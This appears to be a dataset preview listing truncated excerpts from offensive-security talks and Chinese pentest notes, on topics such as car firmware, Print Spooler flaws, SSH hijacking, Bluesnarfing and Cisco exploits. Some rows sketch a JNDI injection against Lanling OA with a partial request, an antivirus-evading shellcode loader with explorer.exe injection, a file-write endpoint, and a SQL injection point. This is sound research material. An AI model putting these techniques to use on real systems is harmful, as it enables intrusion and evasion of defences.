现扫出很多奇奇怪怪的东西,猜测对应目录nginx应该是设置了php禁止执行。
首页长这样
由于没有给我提供账号密码(后面发现这个是后台登录。。给账号密码就... | pdf |
@0x222 Paul Such (SCRT)
@Agixid Florian Gaultier (SCRT)
PLAYING WITH CAR FIRMWARE
(OR HOW TO BRICK YOUR CAR)
SUMMARY
•
Who am I ?
•
Hacking car firmware , why ?
•
Model
•
Hidden menu
•
Finding the firmware – sources
•
Analyzing the firmware
•
Some interesting results
•
A 2.2 Ton (4400 pounds) brick... | pdf |
Dance with Apple Core
盘古安全实验室
关于我们
• 专业的移动安全研究团队
• 专注物联时代安全
• 专心与最新的安全技术
Apple内核101
• 内核 (XNU)是Mach/BSD的混合体
• 运行的驱动程序在单独分离的一套框架
• “DriverKit”也就是现在的IOKit
Apple内核101
• BSD
• XNU的最上层是POSIX/BSD体系
• 采用FreeBSD6.0的代码
• 提供files, processes/pthread, signals等等
• Apple扩展: 增加了很多独有的syscalls
• Mach
• 内核中的微内核
• NeXTSTEP时代的遗留产物
• 提供tas... | pdf |
1
Vista Log Forensics
Dr. Rich Murphey, ACS
Background
Case Study
Engagement
Preliminary Report
Final Report
Vista Event Logging
Logging Service
Vista Event Encoding
Undocumented Internals
Event Log Analysis
Recovery
Correlation
Interpretation
Shadow Copy Services
Provider C
Provider C
Provider B
Provider B
Pr... | pdf |
The Legacy Print Spooler: A story about
vulnerabilities from the previous
millennium until today
Peleg Hadar, Senior Security Researcher, SafeBreach Labs
Tomer Bar, Research Team Leader, SafeBreach Labs
Created: January 2020
Updated: July 2020 (See the “Updated Notes” section)
Table of Contents
Introducti... | pdf |
More MitM Makes
Mana Mostly Mediate
Mischievous Messages
@singe
@cablethief
dominic@sensepost.com
michael@sensepost.com
Tracking Scenarios
Scenario 1 Snoopy
Don’t go to them
Make them come to you
Enterprise EAP
Networks
Scenario 2 EAP
association
4-way handshake
Server Cert
Client Cert
EAP Relay with Sycophant
By @cab... | pdf |
Trust Transience:
Post Intrusion SSH Hijacking
July 2k5 - Blackhat USA 05 &
Defcon 0x0D
So you're a sneaky Blackhat...
The Target
Recon
● Mail headers say MUA
is PINE
● .sig says Debian Sarge,
kernel 2.4.22
● Web logs show egress
HTTPS traffic doesn't go
via a proxy (no
forwarded-for header)
The Plan
Let's Do It
... | pdf |
Bluesnarfing @ CeBIT 2004
Detecting and Attacking bluetooth-enabled Cellphones at the
Hannover Fairground
Dipl.-Ing.(FH) Martin Herfurt
Salzburg Research Forschungsgesellschaft mbH, Austria
martin.herfurt@salzburgresearch.at
March 30, 2004
Abstract
A big shock went through the community when it became public, that some
... | pdf |
蓝某OA后台JNDI命令执⾏
前段时间发了⼀套组合利⽤到xmldecoder反序列化的,但是后⾯拿到源码看了下,
前台和后台的管理员账户不是⼀个密码。可能只是运⽓好,前后台⽤了同⼀个密
码。
之前就有说过后台有JNDI,且提供测试链接。⽆需保存操作。
OA使⽤的是⾃带的jdk1.7.
可以直接使⽤⽹上的Payload进⾏jndi注⼊。
EXP⼯具:https://github.com/welk1n/JNDI-Injection-Exploit
使⽤1.7地址 然后直接点击测试链接就可以:
POC:
POST /admin.do HTTP/1.1
Host: adderss
Connection: close
Connection: ... | pdf |
花了⼀天时间学习WPF图形化开发,C#的图形化我没学过.原始Form实在是丑.
最后完成如下.
加密⽤的RSA.
沙盒判断也很简单,星球⾥⾯发了很多次了.(原来那个)
物理机测试免杀360(主机到了,快乐)
然后想起来看到了⼀个pe感染权限维持的项⽬,趁着⼼情好复现⼀下.
我加到了⾃⼰改的Kit⾥⾯
前⾔
⼝
流沙免杀加载器
RedTeamWing
加密⽅式
加载⽅式
图标
临时⽂件
语⾔
CPU
沙盒烧过
Sleep
Disk
UAC
Mac
进程注⼊
explore.exe
后续
msinLasm-Peiniect-dii
peinject.cpp
Welcome
main.cpp
EXPLORER
main.asm
peinj... | pdf |
S-SDL企业应用实践
关于漏洞、风险、成本
1. 为什么软件总会有漏洞?漏洞是怎么引入的?
◦ 业务需求引入
◦ 产品设计引入
◦ 编码引入
2. 如何应对风险
◦ 缓解风险
◦ 转移风险
◦ 接受风险
3. 安全成本
◦ 对于企业来说,安全投入多少是合适的?
什么是S-SDL
不是一种安全技术,而是E2E的安全工程能力
也是一种Security Built In的解决方案
目标:交付更安全的系统
S-SDL架构
安全策略/安全治理
组
织
架
构
培
训
体
系
研
发
流
程
度
量
体
系
工
具
平
台
安全标准、规范、过程、知识库
人
工具
方法
质量
管理
安全是质量属性的一部分,将安全融入到质量管理是构建S-SDL的... | pdf |
Hack the legacy!
IBM i (aka AS/400) revealed.
Bart Kulach
System . . . . . : DEFCON23
Subsystem . . . . : QTRACK4
Display . . . . . : QPADEV0001
MA█ a MV 08/007
Agenda
Let’s get introduced
Why should we care about legacy?
Evil Java?
Privilege escal... | pdf |
⻄湖论剑 WriteUp By Nu1L
⻄湖论剑 WriteUp By Nu1L
Reverse
ROR
TacticalArmed
Web
EZupload
OA?RCE?
灏妹的web
EasyTp
Pwn
Blind
string_go
easykernel
Misc
签到
Crypto
unknown_dsa
FilterRandom
SpecialCurve2
hardrsa
密码⼈集合
Reverse
ROR
from z3 import *
des = [ 0x65, 0x55, 0x24, 0x36, 0x9D, 0x71, 0xB8, 0xC8, 0x65, 0xFB,
0x87, 0x7F, 0x9A,... | pdf |
摸鱼的时候在挖洞,本身想写一个文件内容过滤的小脚本(误报太多了),发现报错,看网
上貌似是编码问题,于是我就百度了下,发现 py 上加两句就可以了
# -*- coding: utf-8 -*-
# coding:unicode_escape
但是当我运行的时候,我突然发现注释报错了
本来我以为是正常的报错,debug 一下,发现正常代码没任何问题,但我发现行数不对,是
在第 13 行,但是这是被注释掉的内容啊,我深入了一下发现,问题出现在 \n 和
unicode_escape 上,于是我新搞了个文件进行测试
可以成功解析\n,那么使用命令呢
我们可以看到注释的内容并不会在 debug 中跟到注释当中,但是会执行注释当... | pdf |
Lockpicking
Forensics
by datagram
www.lockpickingforensics.com
www.lockwiki.com
Defcon 17, 2009
www.defcon.org
If you've been to a computer security conference recently
you've no doubt seen people learning how to pick locks and
crack safes. In the United States, interest in physical security
has become a natural ex... | pdf |
Popping shells with your cereal box
Michael West
T3h Ub3r K1tten
Colin Campbell
magicspacekiwi
humans.txt
Michael West
magicspacekiwi
Enjoys scanning long barcodes
on the beach
Professional internet tube filler
"Master of the web"
Barcodes are everywhere
Barcodes are everywhere
Barcode scanners are everywhere
Barcodes ... | pdf |
Cisco Catalyst
Exploitation
Artem Kondratenko
Whoami
-Penetration tester @ Kaspersky Lab
-Hacker
-OSC(P|E)
-Skydiver ;)
Cisco advisory
Cisco advisory
• The Cluster Management Protocol utilizes Telnet
internally as a signaling and command protocol between
cluster members. The vulnerability is due to the
combinatio... | pdf |
Measuring and Integrating the
Shadow Economy:
A Sector-Specific Approach
Brian K. Edwards, Ph.D.
Silvio J. Flaim, Ph.D.
Los Alamos National Laboratory
June 30, 2008
2
Overview
• Scope of shadow economic activity
• Size of shadow economy in the United States
and other countries
• Why shadow economies exist
• Adding a... | pdf |
Walk into Starbucks, plop down a laptop, click start, watch the credentials roll in. Enter Subterfuge, a Framework to
take the arcane art of Man-in-the-Middle Attacks and make it as simple as point and shoot. Subterfuge demonstrates
vulnerabilities in the ARP Protocol by harvesting credentials that go across the net... | pdf |
Don’t Fuck It Up!
Zoz
jackdawsart.com
Unjust laws exist: shall we be content to obey
them, or shall we endeavor to amend them,
and obey them until we have succeeded, or
shall we transgress them at once?
—Henry David Thoreau, Civil Disobedience
FUCK IT UP
* y o u * h a v e * b e e n * B S O D o m i z e d *
y ... | pdf |
早上起来刷了下朋友圈,看到了一个新漏洞
蓝凌 OA 存在任意文件写入???蓝凌????并且还有漏洞地址
漏洞在/sys/search/sys_search_main/sysSearchMain.do 下面
这里也给出了 method 为 editrParam。参数为 FdParameters
已经很明确了,那么复现一下。
在 com.landray.kmss.sys.search.jar 中的
com.landray.kmss.sys.search.actions.SysSearchMainAction 类。
method 为 editrParam。
看下流程。
大概就是对 fdParemNames 的内容进行了判空。如果不为空。进... | pdf |
物 联 网 资 产 变 化 研 究
演 讲 人 : 桑 鸿 庆
绿 盟 科 技 资 深 安 全 研 究 员
2019
PART 01
简介
目录
CONTENTS
PART 02
IPv4地址变化
PART 03
分析
PART 04
IPv6地址变化
01
02
03
04
PART 05
影响与建议
05
PART 01
网 络 空 间 引 擎 与 物 联 网 资 产 识 别 简 介
《唐人街探案2》中片段
挪威 Finse 1222酒店
图片来源于网络
网 络 空 间 搜 索 引 擎
物 联 网 资 产 暴 露 概 况
资产
协议探测
Banner
设备识别
Label
41,791
993,445
4,... | pdf |
一个注入点分析
请求 URL:
http://www.xxx.com
POST 数据:
dfpageControl.pageNum=1&dfpageControl.grd_gridId=PER&dfpageControl.co
nditionStr=&dfpageControl.ducs[0].duc_fieldCondition=where_equals&dfpageC
ontrol.ducs[0].duc_fieldValue=114730&dfpageControl.ducs[0].duc_fieldSplit=
and
&dfpageControl.ducs[0].duc_fieldName=per_code&d... | pdf |
IPv6 is Bad for Your Privacy
Janne Lindqvist
Helsinki University of Technology
Telecommunications Software and Multimedia Laboratory
P.O. Box 5400, FIN-02015 TKK, Finland
janne.lindqvist@tml.hut.fi
Abstract. In recent years, covert channel techniques for IPv4 and more
recently for IPv6 have been published by the scienti... | pdf |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.